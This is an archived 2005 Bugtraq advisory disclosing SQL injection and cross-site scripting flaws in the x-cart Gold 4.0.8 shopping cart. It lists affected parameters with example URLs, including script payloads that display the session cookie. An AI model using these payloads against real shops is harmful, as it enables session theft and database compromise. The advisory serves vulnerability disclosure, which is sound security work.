[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050531033816.19220.qmail@www.securityfocus.com>
Date: 31 May 2005 03:38:16 -0000
From: CENSORED <censored@...l.ru>
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in x-cart Gold
SVadvisory#7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: Multiple vulnerabilities in x-cart Gold
The program: x-cart Gold
The vulnerable version: 4.0.8
Homepage: www.x-cart.com
Vulnerability is found: 29.05.05
Has found: CENSORED / SVT / www.svt.nukleon.us
=====================================================================
The description.
SQL - injections
---------------
At research of a product the set Multiple vulnerabilities was revealed
SQL-Injections. Vulnerability mentions practically all parameters.
The first mistake has been found in parameter "cat". In a script
There is no check of this parameter and at substitution of a symbol
"'" Probably, to make SQL-an injection. Further the mistake has been
found in Parameter "productid" as from - for absence of check on
Special symbols, by transfer to this parameter of a symbol "'" occurs
Mistake SQL, and script forwards automatically on page
Speaking about a mistake. On this page the parameter "id" is visible to it
We transfer a symbol "'" and as probably to make SQL - an injection.
Further we look parameter "mode", at substitution Special symbols
There is a mistake and probably to make SQL - an injection. We shall wound
And parameter "section" in it it is possible to make SQL - an injection.
XSS
---------------
Vulnerability of type XSS can make in the same parameters as at mistakes
SQL - injections
=====================================================================
Example
^^^^^^^^^
SQL - injections
---------------
http://example/home.php?cat='[SQL-inj]
http://example/home.php?printable='[SQL-inj]
http://example/product.php?productid='[SQL-inj]
http://example/product.php?mode='[SQL-inj]
http://example/error_message.php?access_denied&id='[SQL-inj]
http://example/help.php?section='[SQL-inj]
http://example/orders.php?mode='[SQL-inj]
http://example/register.php?mode='[SQL-inj]
http://example/search.php?mode='[SQL-inj]
http://example/giftcert.php?gcid='[SQL-inj]
http://example/giftcert.php?gcindex='[SQL-inj]
XSS
---------------
http://example/home.php?cat='><script>alert(document.cookie)</script>
http://example/home.php?printable='><script>alert(document.cookie)</script>
http://example/product.php?productid='><script>alert(document.cookie)</script>
http://example/product.php?mode='><script>alert(document.cookie)</script>
http://example/error_message.php?access_denied&id='><script>alert(document.cookie)</script>
http://example/help.php?section='><script>alert(document.cookie)</script>
http://example/orders.php?mode='><script>alert(document.cookie)</script>
http://example/register.php?mode='><script>alert(document.cookie)</script>
http://example/search.php?mode='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcid='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcindex='><script>alert(document.cookie)</script>
=====================================================================
The conclusion.
^^^^^^^^^^^
Researches made only on version 4.0.8. Other versions as
Can be vulnerable. The manufacturer in popularity is put. If is
What that remarks write on censored@...l.ru
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Search Vulnerabilities Team / www.svt.nukleon.us /
CENSORED | Cash | Fredy | patr0n | Loader |
___
___ / /
____________\__\___ / /
| _______________// _/_
____|__________ |\ \/ | |
/__________________| \____/ |
___| |___
|___ ___|
| |___
|_______|
Powered by blists - more mailing lists